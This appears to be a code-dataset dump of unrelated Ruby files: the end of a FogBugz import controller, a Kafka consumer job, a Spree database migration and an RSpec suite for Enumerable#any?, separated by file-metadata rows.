already_added_projects_names = @already_added_projects.pluck(:import_source)
@repos.reject! { |repo| already_added_projects_names.include? repo.name }
end
# rubocop: enable CodeReuse/ActiveRecord
def jobs
render json: find_jobs('fogbugz')
end
def create
repo = client.repo(params[:repo_id])
fb_session = { uri: session[:fogbugz_uri], token: session[:fogbugz_token] }
umap = session[:fogbugz_user_map] || client.user_map
project = Gitlab::FogbugzImport::ProjectCreator.new(repo, fb_session, current_user.namespace, current_user, umap).execute
if project.persisted?
render json: ProjectSerializer.new.represent(project)
else
render json: { errors: project_save_error(project) }, status: :unprocessable_entity
end
end
private
def client
@client ||= Gitlab::FogbugzImport::Client.new(token: session[:fogbugz_token], uri: session[:fogbugz_uri])
end
def user_map
@user_map ||= begin
user_map = client.user_map
stored_user_map = session[:fogbugz_user_map]
user_map.update(stored_user_map) if stored_user_map
user_map
end
end
def fogbugz_unauthorized(exception)
redirect_to new_import_fogbugz_path, alert: exception.message
end
def import_params
params.permit(:uri, :email, :password)
end
def user_map_params
params.permit(users: %w(name email gitlab_user))
end
def verify_fogbugz_import_enabled
render_404 unless fogbugz_import_enabled?
end
end
| 26.672727 | 125 | 0.730402 |
088e49f803b4838639aaf29290b32ba3e6e9c2cc | 4,327 | require 'date'
class ConsumerJob < ApplicationJob
def perform(params)
puts "performing job"
kafka = KAFKA_CLUSTERS[params[:cluster_name]]
# k = KafkaCluster.find_by(name: params[:cluster_name])
# kafka = Kafka.new(k.broker_uri.split(","), client_id: "KafkaMan", logger: Rails.logger)
cluster_name = params[:cluster_name]
topic = params[:topic]
message_type = params[:message_type]
key_type = params[:key_type]
start_filter = params[:start_filter]
start_filter_value = params[:start_filter_value]
options = {}
if start_filter == 'consumer-group'
consumer = kafka.consumer(group_id: start_filter_value)
consumer.subscribe(topic, start_from_beginning: false)
else
consumer = kafka
options[:topic] = topic
options[:start_from_beginning] = true
end
if start_filter == 'latest'
options[:start_from_beginning] = false
end
checks = {}
checks[:message_type] = message_type
checks[:key_type] = key_type
if start_filter == 'offset'
checks[:offset] = start_filter_value
elsif start_filter == 'previous-x'
previous_offset = kafka.last_offsets_for(topic)[topic]
previous_offset.keys.each do |partition|
previous_offset[partition] = previous_offset[partition].to_i - start_filter_value.to_i
end
checks[:previous_offset] = previous_offset
end
if start_filter == 'today'
checks[:today] = DateTime.now.midnight
elsif start_filter == 'last-hour'
checks[:last_hour] = DateTime.now - (1/24.0)
elsif start_filter == 'specific-date'
checks[:date] = start_filter_value
end
consumer_key = "consumer_#{cluster_name}_#{topic}_#{message_type}_#{key_type}_#{start_filter}_#{start_filter_value}"
RUNNING_CONSUMERS[consumer_key] = consumer
consumer.each_message(**options) do |message|
if start_filter(checks: checks, message: message) && message_filter('key', value: checks[:key_type], message: message.key) && message_filter('value', value: checks[:message_type], message: message.value)
ActionCable.server.broadcast consumer_key, {
value: message.value,
partition: message.partition,
key: message.key,
headers: message.headers,
offset: message.offset,
creation_timestamp: message.create_time
}
end
end
puts "Consumer stopped : #{consumer_key}"
end
def start_filter(checks: , message: )
if checks[:offset].present?
return message.offset >= checks[:offset].to_i
elsif checks[:previous_offset].present?
return message.offset > checks[:previous_offset][message.partition]
elsif checks[:today].present?
return DateTime.parse(message.create_time.to_s) >= checks[:today]
elsif checks[:last_hour].present?
return DateTime.parse(message.create_time.to_s) >= checks[:last_hour]
elsif checks[:date].present?
return DateTime.parse(message.create_time.to_s) >= DateTime.parse(checks[:date])
else
return true
end
end
def message_filter(type , value: , message: )
if value == 'json'
return valid_json?(message)
elsif value == 'xml'
return valid_xml?(message)
elsif value == 'number'
return valid_number?(message)
elsif value == 'bytes'
# TODO: Do byte conversion
return true
else
return true
end
end
def valid_json?(json)
JSON.parse(json)
return true
rescue JSON::ParserError => e
return false
end
def valid_xml?(xml)
begin
Hash.from_xml(xml)
return true
rescue => exception
return false
end
end
def valid_number?(number)
begin
Float(number)
return true
rescue
return false
end
end
end | 34.070866 | 215 | 0.584932 |
014bbe50a7bb34a384f285ea75a3cfa26c81f34e | 207 | class CreateProductsTaxons < ActiveRecord::Migration
def change
add_column :spree_products_taxons, :id, :primary_key
add_column :spree_products_taxons, :position, :integer, :default => 0
end
end
| 29.571429 | 73 | 0.768116 |
4a7511f64930f2b1118f69e6aaa3c102914019cb | 4,641 | require File.expand_path('../../../spec_helper', __FILE__)
require File.expand_path('../fixtures/classes', __FILE__)
describe "Enumerable#any?" do
before :each do
@enum = EnumerableSpecs::Numerous.new
@empty = EnumerableSpecs::Empty.new()
@enum1 = [0, 1, 2, -1]
@enum2 = [nil, false, true]
end
it "always returns false on empty enumeration" do
@empty.any?.should == false
@empty.any? { nil }.should == false
[].any?.should == false
[].any? { false }.should == false
{}.any?.should == false
{}.any? { nil }.should == false
end
it "raises an ArgumentError when any arguments provided" do
lambda { @enum.any?(Proc.new {}) }.should raise_error(ArgumentError)
lambda { @enum.any?(nil) }.should raise_error(ArgumentError)
lambda { @empty.any?(1) }.should raise_error(ArgumentError)
lambda { @enum1.any?(1) {} }.should raise_error(ArgumentError)
lambda { @enum2.any?(1, 2, 3) {} }.should raise_error(ArgumentError)
end
it "does not hide exceptions out of #each" do
lambda {
EnumerableSpecs::ThrowingEach.new.any?
}.should raise_error(RuntimeError)
lambda {
EnumerableSpecs::ThrowingEach.new.any? { false }
}.should raise_error(RuntimeError)
end
describe "with no block" do
it "returns true if any element is not false or nil" do
@enum.any?.should == true
@enum1.any?.should == true
@enum2.any?.should == true
EnumerableSpecs::Numerous.new(true).any?.should == true
EnumerableSpecs::Numerous.new('a','b','c').any?.should == true
EnumerableSpecs::Numerous.new('a','b','c', nil).any?.should == true
EnumerableSpecs::Numerous.new(1, nil, 2).any?.should == true
EnumerableSpecs::Numerous.new(1, false).any?.should == true
EnumerableSpecs::Numerous.new(false, nil, 1, false).any?.should == true
EnumerableSpecs::Numerous.new(false, 0, nil).any?.should == true
end
it "returns false if all elements are false or nil" do
EnumerableSpecs::Numerous.new(false).any?.should == false
EnumerableSpecs::Numerous.new(false, false).any?.should == false
EnumerableSpecs::Numerous.new(nil).any?.should == false
EnumerableSpecs::Numerous.new(nil, nil).any?.should == false
EnumerableSpecs::Numerous.new(nil, false, nil).any?.should == false
end
it "gathers whole arrays as elements when each yields multiple" do
multi = EnumerableSpecs::YieldsMultiWithFalse.new
multi.any?.should be_true
end
end
describe "with block" do
it "returns true if the block ever returns other than false or nil" do
@enum.any? { true }.should == true
@enum.any? { 0 }.should == true
@enum.any? { 1 }.should == true
@enum1.any? { Object.new }.should == true
@enum1.any?{ |o| o < 1 }.should == true
@enum1.any?{ |o| 5 }.should == true
@enum2.any? { |i| i == nil }.should == true
end
it "any? should return false if the block never returns other than false or nil" do
@enum.any? { false }.should == false
@enum.any? { nil }.should == false
@enum1.any?{ |o| o < -10 }.should == false
@enum1.any?{ |o| nil }.should == false
@enum2.any? { |i| i == :stuff }.should == false
end
it "stops iterating once the return value is determined" do
yielded = []
EnumerableSpecs::Numerous.new(:one, :two, :three).any? do |e|
yielded << e
false
end.should == false
yielded.should == [:one, :two, :three]
yielded = []
EnumerableSpecs::Numerous.new(true, true, false, true).any? do |e|
yielded << e
e
end.should == true
yielded.should == [true]
yielded = []
EnumerableSpecs::Numerous.new(false, nil, false, true, false).any? do |e|
yielded << e
e
end.should == true
yielded.should == [false, nil, false, true]
yielded = []
EnumerableSpecs::Numerous.new(1, 2, 3, 4, 5).any? do |e|
yielded << e
e
end.should == true
yielded.should == [1]
end
it "does not hide exceptions out of the block" do
lambda {
@enum.any? { raise "from block" }
}.should raise_error(RuntimeError)
end
it "gathers initial args as elements when each yields multiple" do
multi = EnumerableSpecs::YieldsMulti.new
multi.any? {|e| e == 1 }.should be_true
end
it "yields multiple arguments when each yields multiple" do
multi = EnumerableSpecs::YieldsMulti.new
yielded = []
multi.any? {|e, i| yielded << [e, i] }
yielded.should == [[1, 2]]
end
end
end
| 32.683099 | 87 | 0.615385 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.